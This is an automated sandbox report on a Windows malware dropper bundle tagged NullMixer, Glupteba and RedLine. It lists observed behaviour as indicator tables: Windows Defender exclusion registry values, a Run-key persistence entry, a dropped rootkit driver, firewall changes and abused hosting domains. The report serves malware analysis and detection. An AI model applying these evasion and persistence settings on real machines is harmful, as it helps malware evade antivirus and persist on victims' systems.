Malware Analysis Report

2024-11-13 19:30

Sample ID 241106-mq2exsxqdz
Target e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
SHA256 e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
Tags
fabookie glupteba nullmixer privateloader redline socelars media22m11 publisher2 user2211 aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd

Threat Level: Known bad

The file e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba nullmixer privateloader redline socelars media22m11 publisher2 user2211 aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan

Fabookie

Fabookie family

Glupteba

RedLine

Socelars payload

NullMixer

Redline family

Socelars family

Glupteba family

PrivateLoader

RedLine payload

Detect Fabookie payload

Nullmixer family

Windows security bypass

Socelars

Privateloader family

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Executes dropped EXE

ASPack v2.12-2.42

Checks installed software on the system

Manipulates WinMon driver.

Looks up external IP address via web service

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Scheduled Task/Job: Scheduled Task

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 10:41

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 10:40

Reported

2024-11-06 10:43

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

Signatures

Detect Fabookie payload


Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload


Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload


Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
N/A | N/A | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A
N/A | N/A | C:\Program Files (x86)\Gparted\Build.exe | N/A
N/A | N/A | C:\Program Files (x86)\Gparted\gimagex.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp | N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\QuietDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | bitbucket.org | N/A | N/A
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description | Indicator | Process | Target
File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A

Manipulates WinMonFS driver.

rootkit evasion
Description | Indicator | Process | Target
File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description | Indicator | Process | Target
File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A
File opened for modification | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A
File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Program Files (x86)\Gparted\gimagex.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File created | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File created | C:\Program Files (x86)\Gparted\is-UTKGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File opened for modification | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File created | C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259448320 | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A
File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Program Files (x86)\Gparted\Build.sfx.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File created | C:\Program Files (x86)\Gparted\is-LI9U0.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File created | C:\Program Files (x86)\Gparted\is-QDMNL.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab | C:\Windows\system32\makecab.exe | N/A
File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Gparted\Build.exe

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\gimagex.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
